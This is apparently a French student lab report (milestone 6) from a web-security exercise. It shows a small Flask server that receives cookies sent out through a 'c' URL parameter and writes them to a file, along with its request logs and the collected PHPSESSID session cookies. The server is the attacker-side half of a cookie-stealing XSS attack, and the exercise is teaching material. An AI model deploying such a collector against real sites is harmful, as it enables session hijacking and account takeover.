

# jalon 6

serveur\_collecte.py

```
(venv) tp@rt:~$ python3 script.py
 * Serving Flask app 'script'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:5000
 * Running on http://192.168.33.84:5000
Press CTRL+C to quit
192.168.33.84 - - [10/Jun/2025 14:35:30] "GET /?c=security=medium;%20PHPSESSID=4stn5ls8esa9lu7pv9ngqi6tp0 HTTP/1.1" 200 -
192.168.33.84 - - [10/Jun/2025 14:36:15] "GET /?c=security=medium;%20PHPSESSID=a9s6769kddcbfi91vtvfjqt645 HTTP/1.1" 200 -
```

La capture d'écran montre le lancement d'une application Flask (script.py) dans un environnement virtuel Python : le serveur démarre en mode développement (Debug off) sur toutes les interfaces (0.0.0.0)

script javascript

```
^C(venv) tp@rt:~$ cat script.py
from flask import Flask, request

app = Flask(__name__)

@app.route('/')
def index():
    cookie = request.args.get('c')
    if cookie:
        with open("collecte_cookieess.txt", "a") as f:
            f.write(cookie + "\n")
    return ''

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
```

Ce script lance un mini-serveur web avec Flask. À chaque fois qu'on appelle la page d'accueil en passant un paramètre c dans l'URL, il récupère ce qu'on met dans c et l'ajoute à la fin du fichier collecte\_cookieess.txt.

collecte\_cookieess.txt

```
(venv) tp@rt:~$ cat collecte_cookieess.txt
security=medium; PHPSESSID=iu8bahqjccv2dhlp2e35888n3
security=medium; PHPSESSID=352njhcmpidqj0b223pd47ma90
security=medium; PHPSESSID=4stn5ls8esa9lu7pv9ngqi6tp0
security=medium; PHPSESSID=a9s6769kddcbfi91vtvfjqt645
(venv) tp@rt:~$
```

on voit que les cookie récupéré grâce aux scripts sont bien stocké dans le fichier collecte\_cookieess.txt